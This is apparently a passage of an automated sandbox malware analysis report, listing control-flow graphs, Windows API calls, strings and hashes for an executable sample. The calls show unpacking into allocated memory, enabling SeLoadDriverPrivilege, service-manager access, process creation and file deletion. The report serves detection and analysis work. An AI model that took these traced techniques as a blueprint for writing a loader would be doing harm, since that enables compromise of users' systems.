                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID: ;g+$;g+
                                    • API String ID: 1029625771-3974242271
                                    • Opcode ID: ae91e0bc34fe958b74f79467ccc75a28ee9a55939b08e7434c7d7e9b44309b17
                                    • Instruction ID: b8e56a0264f89f1d084c96ab1037d6a4d953b9c644e8ffedc85886a4e250fbb8
                                    • Opcode Fuzzy Hash: ae91e0bc34fe958b74f79467ccc75a28ee9a55939b08e7434c7d7e9b44309b17
                                    • Instruction Fuzzy Hash: 4C31A130708DB887CA68BE3CF85567E25479F84350BA5593AF646CB390D938CC434F96

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 372 625c20-625c2c call 6263f0 375 625c49-625c4d ExitProcess 372->375 376 625c2e-625c44 call 623e40 call 623da0 372->376 376->375
                                    APIs
                                    • ExitProcess.KERNEL32(00000000), ref: 00625C4B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: ?*S
                                    • API String ID: 621844428-1645505001
                                    • Opcode ID: cafe375cd3ecb9db54b160d5434c68d03f9e6420cbc6a5c7f76c36b052040be9
                                    • Instruction ID: 8faae7015be3adbe397f07c30ef45df985508d43e8fa41075350922fd9952a19
                                    • Opcode Fuzzy Hash: cafe375cd3ecb9db54b160d5434c68d03f9e6420cbc6a5c7f76c36b052040be9
                                    • Instruction Fuzzy Hash: DBD0A720300E2043D2A467B0A401B1A12436BA0700F40841D7545CF385DF654D110B00

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 381 53002d-53009e call 530456 * 6 394 5300a0-5300a2 381->394 395 5300a7-5300b0 381->395 396 53044e-530455 394->396 395->394 397 5300b2-5300b6 395->397 397->394 398 5300b8-5300c2 397->398 399 5300e4-530105 GetNativeSystemInfo 398->399 400 5300c4-5300c7 398->400 399->394 402 530107-53012d VirtualAlloc 399->402 401 5300c9-5300cf 400->401 403 5300d1-5300d4 401->403 404 5300d6 401->404 405 530162-53016c 402->405 406 53012f-530133 402->406 409 5300d9-5300e2 403->409 404->409 407 5301a4-5301b5 405->407 408 53016e-530173 405->408 410 530135-530138 406->410 412 5301b7-5301d1 407->412 413 530234-530240 407->413 411 530177-53018a 408->411 409->399 409->401 414 530153-530155 410->414 415 53013a-530142 410->415 417 530199-53019e 411->417 418 53018c-530193 411->418 434 5301d3 412->434 435 530222-53022e 412->435 419 5302f0-5302fa 413->419 420 530246-53025d 413->420 416 530157-53015c 414->416 415->414 421 530144-530147 415->421 416->410 422 53015e 416->422 417->411 426 5301a0 417->426 418->418 423 530195 418->423 424 5303b2-5303c7 call 6427b0 419->424 425 530300-530307 419->425 420->419 427 530263-530273 420->427 429 530149-53014c 421->429 430 53014e-530151 421->430 422->405 423->417 452 5303c9-5303ce 424->452 431 530309-530312 425->431 426->407 432 5302d5-5302e6 427->432 433 530275-530279 427->433 429->414 429->430 430->416 439 5303a7-5303ac 431->439 440 530318-530333 431->440 432->427 437 5302ec 432->437 441 53027a-530289 433->441 442 5301d7-5301db 434->442 435->412 438 530230 435->438 437->419 438->413 439->424 439->431 445 530335-530337 440->445 446 53034d-53034f 440->446 447 530291-53029a 441->447 448 53028b-53028f 441->448 443 5301fb-530204 442->443 444 5301dd 442->444 461 530207-53021c 443->461 444->443 451 5301df-5301f9 444->451 453 530340-530343 445->453 454 530339-53033e 445->454 449 530351-530353 446->449 450 530368-53036a 446->450 456 5302c3-5302c7 447->456 448->447 455 53029c-5302a1 448->455 459 530355-530357 449->459 460 530359-53035b 449->460 465 530371-530376 450->465 466 53036c 450->466 451->461 462 5303d0-5303d4 452->462 463 53044c 452->463 467 530345-53034b 453->467 454->467 457 5302a3-5302b2 455->457 458 5302b4-5302b7 455->458 456->441 464 5302c9-5302d1 456->464 457->456 458->456 468 5302b9-5302bf 458->468 469 53036e-53036f 459->469 460->450 470 53035d-53035f 460->470 461->442 472 53021e 461->472 462->463 471 5303d6-5303e0 462->471 463->396 464->432 473 530379-530380 465->473 466->469 467->473 468->456 469->473 470->473 474 530361-530366 470->474 471->463 475 5303e2-5303e6 471->475 472->435 476 530382 473->476 477 530388-53039d VirtualProtect 473->477 474->473 475->463 478 5303e8-5303f9 475->478 476->477 477->394 479 5303a3 477->479 478->463 480 5303fb-530400 478->480 479->439 481 530402-53040f 480->481 481->481 482 530411-530415 481->482 483 530417-530429 482->483 484 53042d-530433 482->484 483->480 485 53042b 483->485 484->463 486 530435-53044b 484->486 485->463 486->463
                                    APIs
                                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,00530005), ref: 005300E9
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00530005), ref: 00530111
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674963737.0000000000530000.00000040.00001000.00020000.00000000.sdmp, Offset: 00530000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_530000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocInfoNativeSystemVirtual
                                    • String ID:
                                    • API String ID: 2032221330-0
                                    • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction ID: 4c712a71a5a9bba910b84f6a54dcac072b093b508741fb13f9c91ef1f39fd7cd
                                    • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
                                    • Instruction Fuzzy Hash: 4FD1F171A043068FDB14CF69CCA476ABBE0FF84318F18992DE895CB281E774E955CB91

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 489 41025b-410267 490 410269-41026a 489->490 491 4102d8-4102ea call 412a79 call 411e2c 489->491 492 41026b-410272 490->492 507 4102ec-4102ee 491->507 494 410274-41028b call 412a13 call 412864 call 41257e 492->494 495 41028c-41028e 492->495 494->495 498 410290-410292 495->498 499 410294-410296 495->499 502 410297-4102aa RtlAllocateHeap 498->502 499->502 505 4102d2-4102d6 502->505 506 4102ac-4102b5 502->506 505->507 509 4102c4-4102c9 call 411e2c 506->509 510 4102b7-4102c0 call 412a79 506->510 518 4102cb-4102d0 call 411e2c 509->518 510->492 517 4102c2 510->517 517->518 518->505
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00410274
                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A3A
                                      • Part of subcall function 00412A13: __NMSG_WRITE.LIBCMT ref: 00412A44
                                    • __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 00412864: GetModuleFileNameW.KERNEL32(00000000,0041F722,00000104,00000001,00000000,?), ref: 00412900
                                      • Part of subcall function 00412864: __invoke_watson.LIBCMT ref: 00412929
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041292F
                                      • Part of subcall function 00412864: _wcslen.LIBCMT ref: 0041293C
                                      • Part of subcall function 0041257E: ___crtCorExitProcess.LIBCMT ref: 00412586
                                      • Part of subcall function 0041257E: ExitProcess.KERNEL32 ref: 0041258F
                                      • Part of subcall function 00411E2C: __getptd_noexit.LIBCMT ref: 00411E2C
                                    • RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: ExitProcess_wcslen$AllocateFileHeapModuleName___crt__getptd_noexit__invoke_watson
                                    • String ID:
                                    • API String ID: 4285633346-0
                                    • Opcode ID: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
                                    • Instruction ID: 7e8d332be424b32aeb7339ed39cdb599a77868d368d5d78e5393627917a903ca
                                    • Opcode Fuzzy Hash: 85379f81ff0939ec83c584100c10549c30d19fa7ca46aaa6a850a0ef7457cf0a
                                    • Instruction Fuzzy Hash: 7401B535244301AAE22177B6BC56BEB3748AF81378F20007BF505962E1DAFC8CD5826D

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 521 629530-629548 522 629550-629555 521->522 523 6296f4-6296f9 522->523 524 62955b 522->524 525 6297c7-6297cc 523->525 526 6296ff 523->526 527 629561-629566 524->527 528 62967d-629684 524->528 533 6297d2-6297f7 525->533 534 629580-629585 525->534 529 629773-62977a 526->529 530 629701-629706 526->530 531 629614-629619 527->531 532 62956c 527->532 535 6296a1-6296ac 528->535 536 629686-62969c call 623e40 call 623da0 528->536 537 629797-6297a6 OpenSCManagerW 529->537 538 62977c-629792 call 623e40 call 623da0 529->538 539 629722-629729 530->539 540 629708-62970d 530->540 531->534 544 62961f-629678 531->544 541 6295e3-6295ea 532->541 542 62956e-629573 532->542 533->522 534->522 543 629587-629593 534->543 562 6296c9-6296da 535->562 563 6296ae-6296c4 call 623e40 call 623da0 535->563 536->535 556 6297a8-6297b8 537->556 557 6297bd-6297c2 537->557 538->537 554 629746-62976e call 623c80 539->554 555 62972b-629741 call 623e40 call 623da0 539->555 540->534 548 629713-62971d call 627950 540->548 549 629607-62960f 541->549 550 6295ec-629602 call 623e40 call 623da0 541->550 552 629594-62959c 542->552 553 629575-62957a 542->553 544->522 548->522 549->522 550->549 566 62959e-6295b6 call 623e40 call 623da0 552->566 567 6295bc-6295d0 552->567 553->534 564 6297fc-629803 553->564 554->522 555->554 556->522 557->522 594 6296e0-6296ef 562->594 595 629848-629854 562->595 563->562 576 629820-62982b 564->576 577 629805-62981b call 623e40 call 623da0 564->577 566->567 579 6295d4-6295de 567->579 589 62982f-629845 call 623000 576->589 577->576 579->522 589->595 594->522
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,33A6B453,?,?), ref: 006297A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ManagerOpen
                                    • String ID: y7@+
                                    • API String ID: 1889721586-1251112282
                                    • Opcode ID: 4ce99583d2f2c2dc0d016b40959b7331746ba0511e6e6d4d333f878ed23285b2
                                    • Instruction ID: 59b8b872dcc7a2af961d2c038976abf1e5f658faa588d0c04593fb1fe1329420
                                    • Opcode Fuzzy Hash: 4ce99583d2f2c2dc0d016b40959b7331746ba0511e6e6d4d333f878ed23285b2
                                    • Instruction Fuzzy Hash: 2271A270704B218BD7689F28B84976A72A7ABC4B00F54082DF545DB391EB34DD0ACFA6

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 603 624a80-624a90 604 624a92-624aa8 call 623e40 call 623da0 603->604 605 624aad-624aca 603->605 604->605 610 624ae7-624b05 CreateProcessW 605->610 611 624acc-624ae2 call 623e40 call 623da0 605->611 612 624b83-624b8a 610->612 613 624b07-624b0d 610->613 611->610 616 624b24-624b2b 613->616 617 624b0f-624b23 613->617 620 624b48-624b55 616->620 621 624b2d-624b43 call 623e40 call 623da0 616->621 627 624b72-624b82 620->627 628 624b57-624b6d call 623e40 call 623da0 620->628 621->620 628->627
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 00624B01
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID: D
                                    • API String ID: 963392458-2746444292
                                    • Opcode ID: a42607cc8b33b7252d899052706525ef82f2460d5ec7d6ad20f6892b65024da2
                                    • Instruction ID: 54ae8417c099a1fde11f7696b65ff98a248981107a5886a161c96654188c4805
                                    • Opcode Fuzzy Hash: a42607cc8b33b7252d899052706525ef82f2460d5ec7d6ad20f6892b65024da2
                                    • Instruction Fuzzy Hash: 6621B130B10B615BE764AB68AC02BAB7397AFC4700F44043DBA95CB390EF79C9158B56

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 749 40ec40-40ec6f call 40ebe0 753 40ec71-40ec88 VirtualAlloc 749->753 754 40eca3-40ecb2 749->754 753->754 755 40ec8a-40eca0 753->755 755->754
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0040EC7E
                                    Strings
                                    • tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F, xrefs: 0040EC93
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: tGeKa2B%k9F<3!6T*a>U%*s(fc>&tKC@3cQGhibVLni4I3u>F
                                    • API String ID: 4275171209-1198268820
                                    • Opcode ID: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction ID: 01d0f4e730c09718d0011088008fc3b8b73f4a900f8981e618274441f709c89d
                                    • Opcode Fuzzy Hash: 3b538efd8d0877daca6c9ed735cc7399334d432909fa35e9c6d7cd521d04529b
                                    • Instruction Fuzzy Hash: 9EF046B5A846203BF22157258C0AFAF7E68CB84B50F544528FE046A2C0D7B89A0182DE

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 809 641d10-641d1d 810 641d1f-641d24 809->810 811 641d29-641d35 809->811 812 641e71-641e74 810->812 813 641d37-641d42 811->813 814 641d9d-641da9 811->814 817 641d44-641d4b 813->817 818 641d93-641d98 813->818 815 641db4 814->815 816 641dab-641db2 814->816 819 641dbb-641dcd 815->819 816->819 820 641d4d-641d5b 817->820 821 641d6f-641d8e call 641820 817->821 818->812 822 641dcf-641dd6 819->822 823 641dd8 819->823 820->821 824 641d5d-641d6d 820->824 825 641d90 821->825 826 641ddf-641df1 822->826 823->826 824->818 824->821 825->818 827 641df3-641dfa 826->827 828 641dfc 826->828 829 641e03-641e2e 827->829 828->829 830 641e30-641e39 829->830 831 641e3c-641e59 VirtualProtect 829->831 830->831 832 641e6c 831->832 833 641e5b-641e6a call 641b20 831->833 832->812 833->812
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675098007.0000000000641000.00000020.00001000.00020000.00000000.sdmp, Offset: 00641000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_641000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ece59c011ca11995fc0df33a7473c5c895a4a35bc7471c8a6166e7c8cca55fcb
                                    • Instruction ID: b2d4bf2510f933dcf61f736c4fce1706543164e6704fc9e08ed85d02a0be7b8d
                                    • Opcode Fuzzy Hash: ece59c011ca11995fc0df33a7473c5c895a4a35bc7471c8a6166e7c8cca55fcb
                                    • Instruction Fuzzy Hash: F0419178A00209AFDB04DF54C494BAAB7B2FF89314F24C199E8199F355C775EE82CB80
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeleteFile
                                    • String ID:
                                    • API String ID: 4033686569-0
                                    • Opcode ID: d3272fc551dc7d130d8fd5f583c4763973df626183d0495629ae6b99bd7f17ee
                                    • Instruction ID: 8d6103b6d68024db7397314e677aed85ba09bbcfb8db6d9b539e4437aa6b829e
                                    • Opcode Fuzzy Hash: d3272fc551dc7d130d8fd5f583c4763973df626183d0495629ae6b99bd7f17ee
                                    • Instruction Fuzzy Hash: 6011B670700A3057D7B4AB74AD01A6B35D75FC8700B40483DB505CB380EF39DE068B55
                                    APIs
                                    • LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00626F05,?,33A6B453,006268AC), ref: 00626D00
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: LibraryLoad
                                    • String ID:
                                    • API String ID: 1029625771-0
                                    • Opcode ID: 450cafeed3f7790ea423e706b33a445b0a79b66101ac3bd34d3185fcf5d49d39
                                    • Instruction ID: 7fc590bc83a7b7bd04c8a2960272f91224950998ccfb0413716ba9f193f04048
                                    • Opcode Fuzzy Hash: 450cafeed3f7790ea423e706b33a445b0a79b66101ac3bd34d3185fcf5d49d39
                                    • Instruction Fuzzy Hash: CC01FB30B00A704BD7A4BB79B851A6B26E7AFC9640741983EB519CB391EB38DD034F95
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675098007.0000000000641000.00000020.00001000.00020000.00000000.sdmp, Offset: 00641000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_641000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID:
                                    • API String ID: 621844428-0
                                    • Opcode ID: 3ccb25bdfbbdd56fe5ed32ee7568d6054895871f3093967865143c9235f5bcc1
                                    • Instruction ID: 5634ac93abdc679df3541af8bcd05828c19d3c33ac36558fe1e5ee5ffa0663e7
                                    • Opcode Fuzzy Hash: 3ccb25bdfbbdd56fe5ed32ee7568d6054895871f3093967865143c9235f5bcc1
                                    • Instruction Fuzzy Hash: 81D05EB4D00208FFD740EFE4E906B9CBBB5EB05B05F108168E9045B380EA701B04CB52
                                    APIs
                                    • VirtualFree.KERNELBASE(?,?,?), ref: 0064182F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675098007.0000000000641000.00000020.00001000.00020000.00000000.sdmp, Offset: 00641000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_641000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: FreeVirtual
                                    • String ID:
                                    • API String ID: 1263568516-0
                                    • Opcode ID: 1be060b9b16f4b001732891f65b776588a1f1ea4ade28fd56a88c15a5c284ddb
                                    • Instruction ID: b69d416ed3238aec631d2b8d1dbe4645c735ea8a57f333ac246c8aa2308346b9
                                    • Opcode Fuzzy Hash: 1be060b9b16f4b001732891f65b776588a1f1ea4ade28fd56a88c15a5c284ddb
                                    • Instruction Fuzzy Hash: 16C04C7A11420CAB8B04DF98EC84DAB37BDBB8DA14B048508BA1D87200C630F9108BA4
                                    APIs
                                    • GetUserNameW.ADVAPI32 ref: 0040F53E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F548
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F58B
                                    • CloseHandle.KERNEL32(00000000), ref: 0040F5A2
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: CloseCreateErrorFirstFormatHandleLastMessageNameProcess32SnapshotToolhelp32User
                                    • String ID: $%d K$CreateToolhelp32Snapshot (of processes)$Process32First
                                    • API String ID: 3266005361-2221559773
                                    • Opcode ID: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction ID: 63f366d3fdf1a23c1a20b758398628cdb4654b08413e4f9ed28baa702ff12125
                                    • Opcode Fuzzy Hash: 5abc778807c62ae2baa570d19bc32579730fa3d8dd42b44df11fc9701d9f20bb
                                    • Instruction Fuzzy Hash: 6251B671504300ABD324AB64DC52FEB73E8EF84758F44493EF589922C1EB7C9948879B
                                    APIs
                                    • GetCurrentProcess.KERNEL32 ref: 0040E22E
                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040E23B
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 0040E24D
                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040E28B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: ProcessToken$AdjustCurrentLookupOpenPrivilegePrivilegesValue
                                    • String ID: SeLoadDriverPrivilege
                                    • API String ID: 2349140579-497486668
                                    • Opcode ID: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction ID: 6ea790c7a31b1ba1ad77907437152988263291b3601ce40a83fb03ebe5ecb5a6
                                    • Opcode Fuzzy Hash: cffa3139d4f1966d0e1b8d4b561fce07a712f7e5228b86654aafc6df663748c5
                                    • Instruction Fuzzy Hash: D301DAB4548301AFD704DF50C999F9BBBE4AB8CB08F40891DF58A862A0E774E948CB56
                                    APIs
                                    • IsDebuggerPresent.KERNEL32 ref: 0041212A
                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041213F
                                    • UnhandledExceptionFilter.KERNEL32(0041989C), ref: 0041214A
                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 00412166
                                    • TerminateProcess.KERNEL32(00000000), ref: 0041216D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                    • String ID:
                                    • API String ID: 2579439406-0
                                    • Opcode ID: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction ID: b5dc470c48336d2cad9fc5f7ad5caf64c585ac90b15cfe1187e4ee1c5b5d9eed
                                    • Opcode Fuzzy Hash: 6f2c9a2ca4667ff0c482e712aad0c8141d9414460f1110707eeb279986343969
                                    • Instruction Fuzzy Hash: 8C21DBB4911204EFD700DF69EC896C63BB4BB6C315F50803AE90A87372E7B4598A8F1D
                                    APIs
                                    • GetLastError.KERNEL32 ref: 0040E18D
                                    • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    Strings
                                    • WARNING: %s failed with error %d (%s), xrefs: 0040E1F4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1674807512.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.1674790141.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674827448.0000000000419000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674845323.000000000041D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000000.00000002.1674862376.0000000000422000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (317).jbxd
                                    Similarity
                                    • API ID: ErrorFormatLastMessage
                                    • String ID: WARNING: %s failed with error %d (%s)
                                    • API String ID: 3479602957-1953342023
                                    • Opcode ID: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction ID: 71bfe3ff1a5da696a3addf6ac62f14f1fc4c04e671a446e7e169288bb51f98c2
                                    • Opcode Fuzzy Hash: b598ef8f7daf12207a35918aebcbaa5f324a21470e7471301164a79c2446e67a
                                    • Instruction Fuzzy Hash: 1201267160430066E7249B12DC86BFB3BA9EF8A710F504C3AF555CA1D0E6749890C29E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1675028418.0000000000621000.00000020.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: true
                                    • Associated: 00000000.00000002.1675014188.0000000000620000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000000.00000002.1675045503.000000000062D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_620000_ExeFile (317).jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: *'$lmu/$lmu/
                                    • API String ID: 0-636906075
                                    • Opcode ID: a036e19197d29742138cca9643427d8cacee7da868df3eee7603cf6f7ed43bf0
                                    • Instruction ID: 37d2afa22f23e2c28bc1b32c51d9b3e09740e8fe98a5bd84f9bf39f086aef5f7
                                    • Opcode Fuzzy Hash: a036e19197d29742138cca9643427d8cacee7da868df3eee7603cf6f7ed43bf0
                                    • Instruction Fuzzy Hash: 10022431A04F718BC664EA68F88556E76D39BD0748F64882EF882C7391EE34CD464F97
                                    Strings
                                    Memory Dump Source
